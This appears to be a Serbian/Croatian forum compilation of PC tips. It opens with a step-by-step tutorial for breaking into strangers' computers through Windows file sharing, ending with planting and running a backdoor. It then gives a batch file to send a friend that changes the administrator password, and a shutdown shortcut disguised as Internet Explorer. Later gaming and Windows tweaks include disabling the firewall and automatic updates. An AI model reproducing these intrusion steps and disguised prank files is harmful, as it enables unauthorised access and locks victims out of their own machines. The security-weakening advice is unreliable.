Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.

[Uvodna rec]

Kao prvo zelim da vam objasnim da se necu detaljno zadrzavti na nekim stvarima kako ovo ne bi isuvise bilo komplikovano za "novodosle hakere", jer je ovo ipak tutorial za pocetnike. Ako zelite vise informacija o File Sharingu potrazite ih na NETU.

Ukoliko niste znali Windows ima opciju koja se zove File and Print Sharing. Ovu opciju mozete koristiti ukoliko zelite da delite drajv i stampac sa drugima, sto znaci da ce te dati pristup ostalim ljudima (celoj mrezi) fajlovima i stampacu. Kada ukljucite ovu opciju, vi zapravo ostavljate jedan port otvoren (port 139) koji prihvata konekciju i razume NETBIOS protokol.

U nekim malim firmama (sa LANom) ovo moze da bude i korisno. Na primer, umesto da postoji nekoliko stampaca za svaki kompjuter posebno, koristi se samo jedan stampac koji se nalazi na kompjuteru na kome je ukljucen File and Print Sharing. Ali ukoliko vi koristite Fajl Sharing na vasem kucnom kompjuteru (vidjao sam likove koji ovu opciju imaju ukljucenu, a ni neznaju - jadnici!) koji je konektovan na internet, svako na svetu ko zna vasu IP adresu, moze imati pristup vasem racunaru.

Ukoliko neznate da li je vama ukljucena Fajl Sharing opcija samo idite na Control Panel / Network. Sada trebate da vidite prozor na kome se nalazi spisak svog mreznog software-a koji ste instalirali, kao sto je TCP/IP i dugme File and Print Sharing. Proverite da li je opcija cekirana. Ukoliko jeste (file sharing je ukljucen) onda je uncekirajte tj iskljucite.

[Krecemo sa upadom]

Sada cu vam objasniti nacin na koji mozete da upadnete na kompjuter gde je ukljucen Fajl Sharing. Cinjenica za to da Windows nije bezbedan je to sto alati za hakovanje se nalaze u samom Windowsu. Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba programa se mogu naci u folderu C:\Windows, ali ukoliko ih tamo ne nadjete, onda ih potrazite na instalacionom CD-u Windowsa. Ovi programi se pokrecu iz MS-DOS Prompta. Da bi ste videli pomocni meni (help) za Nbtstat.exe samo ukucajte nbtstat /? i za Net.exe ukucajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP adresa ili host kompjutera u koji upadate. Recimo da upadate u komjuter ciji je host computer.isp.com i IP adresa 123.45.67.8. Prvo sto trebate da uradite jeste to da proverite da li je FileSharing na tom kompjuteru ukljucen. To izvedite tako sto ce te ukucati:

nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA

Bitno je da na drugom nacinu ukucate veliko A. Malo je to cudno zato sto DOS nije CASE SENSITIVE, ali tako to radi. Sada mozete da dobijete dve vrste odgovora. Jedan koji ce reci "Host Not Found" i koji nam govori da na kompjuteru nije ukljucen FileSharing (ili da ste pogresili IP adresu) i drugi koji ce vam dati spisak imena (names) type i status koji znaci da ste na pola puta od ulaska u komp. Tabela bi trebala da izgleda ovako:

Name Type Status
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

Kako sada da upadnete? Lako! Prvo morate da podesite Lmhosts fajl koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoc notepada, a ukoliko ga nema u Windows direktorijumu, onda ga napravite sami (samo ne zboravite da se fajl zove 'Lmhosts' i da NEMA EKSTENZIJU). Da bi ste ga napravili samo otvorite Lmhosts fajl u notepadu, unesite zrtvinu IP asresu, pritisnite TAB, i unesite 'Share Name' - ime koje ste nasli uz pomoc nbtstat-a (u tabeli). Sada snimite ovaj fajl i izadjite iz notepada. Sada postoje dva nacina na koji mozete da pristupite kompjuteru: najlaksi, lak i kul nacin!!!

[Najlaksi nacin]
Imate IP adresu? Imate Share name? OK! Idite na START > RUN i samo unesite sledece:
//IPADRESA/SHARENAME/
na primer:
//123.45.67.8/hostbug/
Ovime ce vam se pojaviti prozor slican onome koji dobijete kada kliknete na My Computer ikonu iz koga ce te moci da pretrazujete zrtvin kompjuter.

[Lak nacin]

Ukoliko ne zelite previse da se mucite onda samo idite na START / FIND / COMPUTERS i unesite IP adresu kompjutera u koji zelite da upadnete. Ukoliko ste dobro konfigurisali Lmhosts fajl, izacice vam prozor sa fajlovima iz zrtvinog kompjutera. Fakticki bice kao da radite na svom kompjuteru.

[Kul nacin]

Za kul nacin upada u komp uz pomoc file shareinga bice vam potreban program Net.exe. Savetujem vas da prvo procitate pomoc tako sto ce te uneti net /?. (u DOS prozoru). Takodje mozete koristiti i komandu:
net opcija /? - gde je opcija odredjena opcija za koju vam treba pomoc.

Da bi ste pristupili kompu na ovaj nacin morate prvo kreirati virtualni drajv. Ovo ce te uraditi ako ukucate:
net use drajv \\[IPADRESA]\[SHARENAME]
Sada cemo prouciti komandu:
- 'drajv' je oznaka virtualnog drajva koji moze biti f: g: z: x: itd...
- '[IPADRESA]' je IP adresa kompjutera u koji upadamo (npr. 123.45.67.8)
- '[SHARENAME]' je Share Name tj. ime koje ste nasli uz pomoc nbtstat-a (u tabeli).

Komanda izgleda nesto slicno ovome:
net use x:\\123.45.67.8\hostbug

Nakon sto izvrsite ovo, samo ukucajte slovo drajva (u nasem primeru x:) i pretrazite drajv uz pomoc MS-DOS komandi.

Mozete dodatno ulepsati stvar:
Iskopirajte backdoor (zadnja vrata) na virtualni drajv i pokrenite ga kako bi uvek imali pristup ovom kompjuteru. Ukoliko kopirate i pokrecete backdoor uradite to na sledeci nacin:
copy c:\backdoor.exe x:
x:
run=%SystemRoot%\backdoor.exe

Ovo ce pokrenuti backdoor na zrtvinom kompjuteru i omoguciti vam stalni pristup ovom kompjuteru. Ovo je kraj teksta o upadima na kompjutere koji imaju ukljucen File Sharing... sledeci put mozda malo i vise o tome, ali do tada nabavite neke dobre NT FileSharing tekstove sa neta i prostudirajte ih.

Kao sto bi rekao Dennis Huges iz FBI-a:
"Jedini sigurni komputer na svetu je onaj koji je iskljucen, zakljucan u sefu i zakopan 20 metara pod zemljom na tajnoj lokaciji... mada ni za njega nisam previse siguran."


Postavljanje passworda vasem drugu na njegov kompjuter preko msn-a


Da bi ste postavili vasem drugu password preko msn-a treba da znate ko je administrator kompjutera, ako to znate onda je sve lako.


Otvorite notepad.
U prvi red kucajte @echo off - u drugi red kucajte net user administrator kompjutera i pass - u treci red kucajte echo i vasu poruku - u cetvrti red kucajte pause. Npr:


@echo off
net user Suky "123456"
echo postavio sam ti pass muahaha
pause

u gornjem desnom uglu nalazi se file, tu kliknite i nadjite Save As... sacuvajte gde god hocete i kako hocete da se zove ali mora na kraju da stoji .bat
npr: suky.bat

i to sve posaljite vasem prijatelju

-----------------------------------------------------------------------------------------------------------------------------------------------------


Evo ovo je jednostavi trik kako ubrzati mozilu,softver nije potreban.


1. Ukucajte "about:config" unesite u address bar kliknite enter. Počnite se spuštati dole i tražite određene podatke.

2. Promjenite točno kako ovde piše:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"

Postavi "network.http.pipelining.maxrequests" promjenite u broj 30. To znači da če otvoriti 30 naredba od jendanput.

3. Na kraju kliknite desnim klikom miša bilo gdje i promjenite novi -> Integer. Nazovite ga "nglayout.initialpaint.delay" i postavite na "0". Ovo je vrijeme koje mozila čeka dok prima informacije sa neta.


NAPOMENA: Ovaj trik radi samo na ADSL-U.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------Pokazat cu vam kako nekome ugasiti kompjuter u odredjeno vreme...
Prvo: kliknite desnim klikom na dekstop, pa new, pa shourcut...
Kada vam se otvori prozor tu upisite:
%windir%\system32\shutdown.exe -s -t 90 -c "vasa poruka"
Idite next i Internet Explorer kako vi zelite i OK.
Nadjite taj vas file na dekstop i promenite ikonu u Internet Exlorer
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


Evo ovde cu objasniti kako u igri nekim prostim komandama da povecate FPS ili da smanjite ping. Sto se tice rate podesavanja smorio sam se dok sam izvalio kako se sve to mnozi i deli sa brzinom konekcije, krivi su ovi sto su upakovali SDK i ne umeju lepo da objasne stvari unutra. Prvo da krenemo na ping.

Ispod cu da napisem konekcije i koje komade bi trebalo da idu za neke odredjene. Takodje bi ovo moglo da pomogne da klijenti brze skidaju neke stvari sa servera.

128/64
----------
rate 14746
cl_updaterate 45
cl_rate 7373
cl_cmdrate 53

256/64
-----------
rate 20000
cl_updaterate 45
cl_rate 7373
cl_cmdrate 53

512/128
-------------
rate 20000
cl_updaterate 45
cl_rate 14746
cl_cmdrate 100

768/192
--------------
rate 20000
cl_updaterate 45
cl_rate 20000
cl_cmdrate 100

To bi bilo to sto se tice stvari koje uticu na ping. Ima jos par ali nisu tolko bitni kao ovi. Napominjem da nebi trebalo da rate ili cl_rate stavite da budu veci od 20000 zato sto bi ste lagovali celom serveru a ne samo vama...

Sto se tice FPS (Frames Per Second)
Kod:

cl_himodels = Ova komanda zahteva od Engine-a igre da ucini da Modeli budu visokog kvaliteta, tako bi izgledali lepse ali bi vukli FPS, za one koji imaju slab komp neka stave ovo na 0

Kod:

violence_ablod ili violence_hblod = Krv u igri, ako vam bas treba FPS, stavite obe komande na 0


Kod:
cl_weather = Kisa, sneg i ostalo slicno, stavite na 0 ako vam kisha na aztecu smanjuje FPS

Kod:

cl_shadows = CS ima posebne senke u stilu Crtaca ispod igraca Jezik ako vam se ne svidja iskljucite toKako povecati fps u CS? Posto mnogi muce muku sa fps, koji je mnogo bitan za gameplay uopste, napisao sam jedan mini tutorijal koji moze pomoci (ovo je namenjeno samo onima kojima fps pada ispod 100...kao meni npr na malim mapama rokne ispod 50
1. Skinite najnovije drivere za graficku karticu, kao i za zvucnu.
2. U podesavanjima za graficku karticu:
Antialiasing=OFF
Anisotropic filtering=OFF
Image settings=HIGH PERFORMACE
Vertical Sync=OFF
3. Napraviti novi text fajl (desni klik na desktop>NEW>Text Document). Promeniti ime u "deleteprefetch" , bez navodnika. U text fajlu upisati "del C:\Windows\Prefetch*.* /Q", takodje bez navodnika. Zatim, File>save as... i kao ime fajla upisati deleteprefetch.bat. Na ovaj nacin se kreirao .bat fajl koji brise prefetch (nesto kao temp fajlovi) fajlove. Ovo vise sluzi za dobijanje performansi u windowsu, ali pomaze i u CS.
4. U okviru foldera C:\windows\system32 pronaci fajl:
"atioglxx.dll" za one sa ATI grafickim karticama
"nvoglnt.dll" za NVIDIA usere
"opengl32.dll" za ostale modele
desni klik na taj fajl pa copy.
Iskopirati (paste) ga u C:\Program Files\Steam\steamapps\tvoj_account\counter-strike\gldrv. Ako si non-steam user potrazi folder gldrv pored cstrike foldera.
Otvoriti sa notepadom drvmap.txt i sve izbristati iz njega i upisati sledece:
"gldrv/nvoglnt.dll OpenGL Driver" - za NVIDIA usere
"gldrv/atioglxx.dll OpenGL Driver" - za ATI usere
"gldrv/opengl32.dll OpenGL Driver" - za ostale (!bez navodnika!)
Restartovati Counter-Strike i u opcijama za Video staviti OpenGl.

--------------------------------------------------------------------------------

da prvo kažem da uvek postoji neka doljnja granica što se "jaèine" mašine za kako-tako igranje cs-a. Po meni to je (znaèi minimum) 384 sdrama, 1.7 p4 procesor, te grafièka 64 rama ...'geforce 3' pod uvjetom da su windowsi nabrijani do jaja. Na tom stroju postižem od 55 - 70 fps (55 kada je gužvanjac )
dodatak : Hdd 7200 x obrtaja


Primetili ste da "šteka", ali neznate koliko "šteka", go to console
cl_showfps 1

----------------------------------------------------------------------------------------------------------
Pre svega molim vas iskljuèite vertical sync off, te pogledajte koliko je fps. Ako ste zadovoljni onda nema potrebe više prèkati. Ako je vertical sync on Uvijek æe biti 60 fps i da je najbolja grafièka.
desni klik na desktop, properties sad ideš na najdesniji tab, prvi ti je themes...
tamo ideš na advanced. sada ako imaš nvdia , pronadji nešto od nje. tamo imate "control panel", potrazite opciju tu negde....
u konzolu utipkajte fps_max 101
p.s. Ako nemožete doæi do te opcije, neka greška se javi. Update-ajte si grafièke drivere
----------------------------------------------------------------------------------------------------------

WINDOWS

1. Skidanje NOD32 programa. http://www.nod32.com.hr/ antivirus program. Èišèenje "govana".

2. Skidanje Ad-aware programa http://www.lavasoftusa.com/, Èišèenje mrlja što je ostalo kad smo èistili ona sranja malopre.

3. Idite u control panel add remove programs, te sve ono što nam netreba, briši.
"nemogu navoditi programe jer se razlikuju kod svakoga"

4. Desni click na my computer ikonu, te properties. Tu æemo iæi na advanced (iliti dodatno)

- a) performansa - staviti na best performance (visual effects)
- advanced Proccesor sharing, staviti na BACKGROUND PROCES!
- korištenje memorije - za program ostaviti...
- klikniti na virtual memmory, te maknite ono da sustav odreðuje dodjeljivanje memorije, stavite ruèno (#stavite od 500 - 1000# . ali pazite da imate toliko MGB slobodno!!!! ) znaèi ak imate 3 gb slobodno, stavite 500 - 1000 , ak imate 300 mega, onda briši sranja i oslobodi gigu...

sada sve lepo ok i opet desni click na my computer, properties
- cool.gif hardware - tamo odite na device manager i potražite IDE ATAPI controllers, pod primary i secondary IDE channel (#desna tipka na prim ili sec, properties, advanced properties#) pogledajte da li je stavljen DMA mode if available, obièno je ukljuèeno ali ako nije :S . Znaèi na oba stavite DMA mode if available....

toliko o my computer ikoni

6. kliknite start , run i napišite services.msc . Tamo pogasite sve servise koji vam netrebaju. Opet ja nemogu vam govoriti koji da brišete, jer svakome se razlikuju. Ali , mogu vam reæi Par koji svi imaju a "netrebaju" . npr. Printer spooling , automatic updates te themes...
Tu se malo zaigrajte (imate descriptions koji opisuje šta radi koji) , ako neznate šta radi, probajte ga ugasiti, pa ako radi cs, ok, ako neradi, onda æeš ga oèito upaliti...

Inaèe, ti servisi "pojedu" memoriju windowsa, a svaki ram je važan kada imaš kantu od kompa.

7. Instalirajte si registry mechanic http://www.pctools.com/registry-mechanic/?...T_RON_RM_300_07
On æe vam oèistiti registri od smeæa koje se nakupljalo mjesecima, pa i godinama...

8. na shortcut kantera (desni klik, properties) dodajte ovo - console, game cstrike, tak da izgleda "C:\IGRE\HALF LIFE CS\HL.EXE" -CONSOLE -GAME CSTRIKE
spasi nešto memorije

9. Defragmentirajte hard dick, start , run, tam utipkajte dfrg.msc
kada poène hdd šrotat, onda je vrijeme za defragment

10. Skinite Powerstrip program, toplo preporuèujem
http://www.computerbase.de/downloads/softw...ten/powerstrip/
pogledajte malo opcije pod tweak vaše grafièke (nemojte previše clockati grafièku jer može riknuti, ja to uvijek uzmem do 20 % poveæanje) te zanimljiva opcija refresh memory...

11. Skinite drivere za svoju grafièku, pazite, najnoviji nemoraju biti najbolji. Pod opcijama (desni klick na desktop- properties, tamo nadjite advanced $kod rezolucije bude$, pogledajte malo opcije, stavite na best performance #tamo je negdje#, stavite vertical sync OFF, iskljuèite antialiasing i sve ostale pi°darije
Stavite DEFAULT COLOR DEPTH FOR TEXTURES ALWAYS USE 16BPP

12. Ctrl . alt , del , upaliti æe vam se taskmanager, poredajte procese koji zauzimaju najviše memorije. E sad ovako, sve ugasite procese osim, svchost, explorer, taskmgr, services, system. Pogasite i te sve male gluparije jer ram po ram, dva rama.
#ako imate logitech miš, setpoint ostaje, te powerstrip ako ga imate#

ovaj korak neka vam uðe u krv, jer svaki put kada se windowsi resetiraju ovi se opet pokrenu, a da vam sada ja pišem tu kako to srediti, nisam lud, toliko...


13. Pogasite automatic updates, te windows firewall i te bill gates stvarèice...

BIOS - ako oæete baš ono do jaja nabrijavanje

http://www.pcstats.com/articleview.cfm?art...1605&page=3

Automatski si update svoju verziju biosa.

Ako neznate ulaziti u bios, kada upalite komp, pritišèite del (95 % sluèajeva), ili f2 (4 posto) il f4 (63 posto?), piše tamo negdje ali brzo èitaj šta treba stisnut

Tamo nadjite opciju za grafièku karticu, AGP aperture size , ako vaša grafièka ima npr 64 rama iako tamo piše da AGP aperture size 128, stavite na 64.

SDRAM precharge control disabled
Delayed transaction - enabled (pomaže ukoliko dodje do $choke$ )
IDE HDD block mode - enable
ima još sitnica, ali ovo je sasvim dovoljno. neki biosi nemaju neke od navedenih opcija

Save yes....
Reset.
Ponovite korak 12 , i 10 (ako imate powerstrip)

COUNTER STRAJK

ne pokreæemo još igricu, šta si nestrpljiv

1. odi u direktorij gdje si snimio igricu , te u poddirektorij cstrike, otvori Notepad (e tko nezna šta je notepad, njega niti mama nevoli) i
http://www.yourfilehost.com/media.php?cat=...;file=csfps.cfg
to kopiraj u taj direktorij.
To je moja skriptica , sve legalne naredbe, poboljšati ce vam fps.

Sve naredbe si možete kopirati u autoexec.cfg (ako nepostoji sam preimenujte csfps.cfg), to æe vam samo pomoæi u dobijanju vremena da nemorate svaki put kada hoæete pokrenuti skriptu iæi ovako. consola , exec csfps.cfg #da bi je pokrenuli# ako stavite autoexec, ona æe se automatski pokrenuti kada igra krene

molim vas dodajte još ove sitnice što sam zaboravio u skriptu prije svih drugih naredbi..
developer 1
fps_max 101

2. http://netti.nic.fi/~amaki/models/
Tu skinite one "ružnije"
Pratite uputstva kako ih instalirati

----------------------------------------------------------------------------------------------------------
#dodatne korisne stvarcice.

start , run C:\windows\system.ini (možda je kod vas D:, pogledajte, ak se otvori onda je C sigurno )
dodaj liniju pod [386Enh]
ConservativeSwapFileUsage=1
----------------------------------------------------------------------------------------------------------

Možda sam nešto zaboravio, ak se sjetim dodat æu. Da , nisam rekao najbolju opciju, najbolja opcija vam je format C: (ne to upisivati-to briše sve sa diska) install windowsa , malo neke od gornjih opcija... I samo counter instalirati, pa fino ide.

-----------------------------------------------------------------------------------------------------------------------------------------

                                                       Kako napraviti nevidljivi FOLDER

Otvorite novi folder...

Kliknite desnim klikom na njega i rename...

Drzite levi alt i upisite brojeve 0160, zatim pritisnite enter.

Kliknite opet desnim klikom na folder pa properties, u zaglavlju nadjite shoutcut, pa nadjite CHANGE ICON, kliknite na change ikon i nadjite prazno mesto tu kliknite i ok.

Videcete da nema foldera ako povucete levim klikom preko celog ekrana naci ce te jednu malu malo jacu plavu boju, tu kliknite 2 put i upalice vam se folder!!!!!

-------------------------------------------------------------------------------------------------------------------

                                                      Evo jedne male fore na windows xp!!!

Otvorite notepad...

Kucajte Start 20 puta ali da bude jedno ispod drugog, npr:
Start
Start
Start
Start
Start

Start
Start
Start
Start
Start

Start
Start
Start
Start

Start
Start
Start
Start
Start
Start
Start
Start
Start

Start
Start
Start

Udjite u gornji desni ugao file pa nadjite Save As...
Stavite ime box.bat
i sacuvajte ga na dextop


                                                                                         Evo jos jedan mali trik

Otvorite Notepad...
U prvom redu kucajte msgbox "vasa poruka",20,"jos jedna poruka"
I to sacuvajte kao box.vbs ili nekako drugacije ali mora da bude na kraju .vbs
Npr:
msgbox "da ili ne",20,"da li vam se svidja np-beta???"
Save AS...          np-beta.vbs